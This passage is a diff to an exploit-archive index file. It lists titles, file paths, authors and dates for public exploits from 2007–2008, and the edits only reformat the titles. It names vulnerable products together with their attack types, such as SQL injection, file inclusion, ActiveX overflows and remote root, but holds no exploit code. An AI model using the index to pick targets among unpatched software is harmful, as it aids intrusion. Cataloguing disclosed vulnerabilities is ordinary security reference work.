1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel Remote Code Injection Exploit",2007-11-18,Liz0ziM,php,webapps,0 4636,platforms/php/webapps/4636.txt,"joomla component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0 @@ -4292,7 +4292,7 @@ id,file,description,date,author,platform,type,port 4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 article.php SQL Injection Exploit",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - (kb_whois.cgi) Command Execution",2007-11-22,"Zero X",cgi,webapps,0 -4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 RTSP Response Remote SEH Overwrite PoC",2007-11-23,h07,multiple,dos,0 +4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote SEH Overwrite PoC",2007-11-23,h07,multiple,dos,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 @@ -4310,7 +4310,7 @@ id,file,description,date,author,platform,type,port 4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow Exploit",2007-11-27,Nphinity,windows,remote,0 4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit",2007-11-27,"YAG KOHHA",windows,remote,0 4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL Injection",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 -4666,platforms/php/webapps/4666.txt,"Eurologon CMS files.php Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 +4666,platforms/php/webapps/4666.txt,"Eurologon CMS files.php - Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injection",2007-11-27,Kacper,php,webapps,0 4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 @@ -4332,7 +4332,7 @@ id,file,description,date,author,platform,type,port 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 -4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 +4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu 1228.0 - mach-o Local Kernel Denial of Service Proof of Concept",2007-12-04,mu-b,osx,dos,0 4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 - (leopard) vpnd Remote Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery 2.0b5 - (catid) SQL Injection",2007-12-05,K-159,php,webapps,0 @@ -4364,7 +4364,7 @@ id,file,description,date,author,platform,type,port 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - (index.php template) Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 -4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 +4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 @@ -4376,7 +4376,7 @@ id,file,description,date,author,platform,type,port 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 -4732,platforms/linux/dos/4732.c,"Samba 3.0.27a send_mailslot() Remote Buffer Overflow PoC",2007-12-14,x86,linux,dos,0 +4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow PoC",2007-12-14,x86,linux,dos,0 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0 4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0 4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilties",2007-12-14,"Michael Brooks",php,webapps,0 @@ -4460,14 +4460,14 @@ id,file,description,date,author,platform,type,port 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0 -4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module inotes6.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 -4819,platforms/windows/remote/4819.html,"Macrovision Installshield isusweb.dll SEH Overwrite Exploit",2007-12-30,Elazar,windows,remote,0 -4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module dwa7w.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 +4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module - inotes6.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 +4819,platforms/windows/remote/4819.html,"Macrovision Installshield - isusweb.dll SEH Overwrite Exploit",2007-12-30,Elazar,windows,remote,0 +4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection",2007-12-31,x0kster,php,webapps,0 4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 - (rss.php albumnr) SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0 -4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0 +4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 @@ -4500,7 +4500,7 @@ id,file,description,date,author,platform,type,port 4855,platforms/php/webapps/4855.txt,"Shop-Script 2.0 - index.php Remote File Disclosure",2008-01-06,Fisher762,php,webapps,0 4856,platforms/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - Denial of Service (no-steam)",2008-01-06,"Eugene Minaev",multiple,dos,0 4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,php,webapps,0 -4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 Cookies SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 +4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Remote File Upload / Auth Bypass",2008-01-07,"Eugene Minaev",php,webapps,0 4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 Cookies SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 @@ -4511,7 +4511,7 @@ id,file,description,date,author,platform,type,port 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0 4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0 -4869,platforms/windows/remote/4869.html,"Gateway Weblaunch ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 +4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password Exploit",2008-01-09,Dj7xpl,php,webapps,0 4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 @@ -4535,7 +4535,7 @@ id,file,description,date,author,platform,type,port 4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection Exploit",2008-01-11,rgod,php,webapps,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow Exploit",2008-01-11,shinnai,windows,local,0 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0 -4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit",2008-01-11,Elazar,windows,remote,0 +4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - ccpm_0237.dll BoF Exploit",2008-01-11,Elazar,windows,remote,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - (id) SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 @@ -4554,7 +4554,7 @@ id,file,description,date,author,platform,type,port 4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - (showproduct.asp cat) SQL Injection Exploit",2008-01-14,JosS,asp,webapps,0 4911,platforms/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption PoC",2008-01-15,mu-b,windows,dos,0 4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - (delete id) Remote Admin Bypass",2008-01-15,ka0x,php,webapps,0 -4913,platforms/windows/remote/4913.html,"Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 +4913,platforms/windows/remote/4913.html,"Macrovision FlexNet - isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 @@ -4608,7 +4608,7 @@ id,file,description,date,author,platform,type,port 4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - (sid) SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - (sid) SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 -4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control ActiveX Remote Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 +4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - (voircom.php id) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 @@ -4623,10 +4623,10 @@ id,file,description,date,author,platform,type,port 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control Buffer Overflow Exploit",2008-01-24,Elazar,windows,remote,0 4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - (optimizer.php files) Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod PoC",2008-01-24,rgod,windows,remote,0 -4982,platforms/windows/remote/4982.html,"Gateway WebLaunch ActiveX Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 +4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0 4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0 -4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 +4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 AddFile() Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (fd/XSS) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 @@ -4637,7 +4637,7 @@ id,file,description,date,author,platform,type,port 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - pitrig_truncate PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,sh2kerr,multiple,local,0 -4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)",2008-01-28,sh2kerr,multiple,dos,0 +4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)",2008-01-28,sh2kerr,multiple,dos,0 4998,platforms/windows/local/4998.c,"IrfanView 4.10 - (.fpx) Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 @@ -4667,7 +4667,7 @@ id,file,description,date,author,platform,type,port 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0 5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 -5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b SQL Injection",2008-01-31,S@BUN,php,webapps,0 +5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 M3U File Local Buffer Overflow Exploit",2008-02-01,"fl0 fl0w",windows,local,0 @@ -4680,16 +4680,16 @@ id,file,description,date,author,platform,type,port 5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - (topicid) SQL Injection",2008-02-02,S@BUN,php,webapps,0 5041,platforms/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass",2008-02-02,"the redc0ders",php,webapps,0 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / SQL Injection Exploit",2008-02-02,"Khashayar Fereidani",php,webapps,0 -5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF PoC Exploit",2008-02-02,h07,windows,dos,0 +5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote BoF PoC Exploit",2008-02-02,h07,windows,dos,0 5044,platforms/windows/dos/5044.pl,"IpSwitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow PoC",2008-02-03,securfrog,windows,dos,0 -5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll ActiveX BoF Exploit",2008-02-03,plan-s,windows,remote,0 -5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF Exploit",2008-02-03,anonymous,windows,remote,0 +5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll ActiveX BoF Exploit",2008-02-03,plan-s,windows,remote,0 +5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote BoF Exploit",2008-02-03,anonymous,windows,remote,0 5047,platforms/php/webapps/5047.txt,"Joomla Component mosDirectory 2.3.2 - (catid) SQL Injection",2008-02-03,GoLd_M,php,webapps,0 -5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF Exploit (2)",2008-02-03,exceed,windows,remote,0 +5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote BoF Exploit (2)",2008-02-03,exceed,windows,remote,0 5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader - (ImageUploader4.ocx 4.5.57.0) BoF Exploit",2008-02-03,Elazar,windows,remote,0 5050,platforms/php/webapps/5050.pl,"A-Blog 2 - (id) XSS / SQL Injection Exploit",2008-02-03,"Khashayar Fereidani",php,webapps,0 -5051,platforms/windows/remote/5051.html,"Yahoo! Music Jukebox 2.2 AddButton() ActiveX Remote BoF Exploit (3)",2008-02-03,Elazar,windows,remote,0 -5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BoF Exploit",2008-02-03,Elazar,windows,remote,0 +5051,platforms/windows/remote/5051.html,"Yahoo! Music Jukebox 2.2 - AddButton() ActiveX Remote BoF Exploit (3)",2008-02-03,Elazar,windows,remote,0 +5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX mediagrid.dll AddBitmap() BoF Exploit",2008-02-03,Elazar,windows,remote,0 5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 @@ -4698,9 +4698,9 @@ id,file,description,date,author,platform,type,port 5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - (Itemid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 - (index.php page) Local File Inclusion",2008-02-04,DSecRG,php,webapps,0 -5061,platforms/php/webapps/5061.txt,"All Club CMS 0.0.1f index.php Local File Inclusion",2008-02-04,Trancek,php,webapps,0 +5061,platforms/php/webapps/5061.txt,"All Club CMS 0.0.1f - index.php Local File Inclusion",2008-02-04,Trancek,php,webapps,0 5062,platforms/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - (images.php id) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 -5063,platforms/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 +5063,platforms/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b - .M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5064,platforms/php/webapps/5064.txt,"All Club CMS 0.0.2 - index.php SQL Injection",2008-02-05,ka0x,php,webapps,0 5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 - (pic) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 @@ -4844,12 +4844,12 @@ id,file,description,date,author,platform,type,port 5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control - (PVCalendar.ocx) BoF Exploit",2008-02-29,Elazar,windows,remote,0 5206,platforms/php/webapps/5206.txt,"Koobi CMS 4.3.0 - 4.2.3 (categ) SQL Injection",2008-02-29,JosS,php,webapps,0 -5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica (id) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - (id) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0 5211,platforms/php/webapps/5211.txt,"Dynamic photo gallery 1.02 - (albumID) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 -5212,platforms/windows/remote/5212.py,"MiniWebSvr 0.0.9a Remote Directory Transversal",2008-03-03,gbr,windows,remote,0 +5212,platforms/windows/remote/5212.py,"MiniWebSvr 0.0.9a - Remote Directory Transversal",2008-03-03,gbr,windows,remote,0 5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart SQL Injection",2008-03-04,bius,php,webapps,0 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 @@ -4862,7 +4862,7 @@ id,file,description,date,author,platform,type,port 5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0 5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injection",2008-03-09,xcorpitx,php,webapps,0 5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 -5225,platforms/windows/dos/5225.html,"KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow PoC",2008-03-10,void,windows,dos,0 +5225,platforms/windows/dos/5225.html,"KingSoft - UpdateOcx2.dll SetUninstallName() Heap Overflow PoC",2008-03-10,void,windows,dos,0 5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0 5227,platforms/solaris/local/5227.c,"Solaris 8/9/10 - fifofs I_PEEK Local Kernel Memory Leak Exploit",2008-03-10,"Marco Ivaldi",solaris,local,0 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / null pointer",2008-03-10,"Luigi Auriemma",windows,remote,0 @@ -4922,7 +4922,7 @@ id,file,description,date,author,platform,type,port 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base SQL Injection",2008-03-20,xcorpitx,php,webapps,0 5287,platforms/windows/local/5287.txt,"Microsoft Office Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion",2008-03-21,0x90,php,webapps,0 -5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 +5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra - (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - (cid) SQL Injection",2008-03-21,S@BUN,php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - (cat_id) SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection Exploit",2008-03-21,The:Paradox,php,webapps,0 @@ -4965,7 +4965,7 @@ id,file,description,date,author,platform,type,port 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection",2008-03-31,anonymous,php,webapps,0 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (Win32)",2008-03-31,Heretic2,windows,remote,80 5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - (articleId) SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 -5332,platforms/windows/remote/5332.html,"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0 +5332,platforms/windows/remote/5332.html,"Real Player - rmoc3260.dll ActiveX Control Remote Code Execution 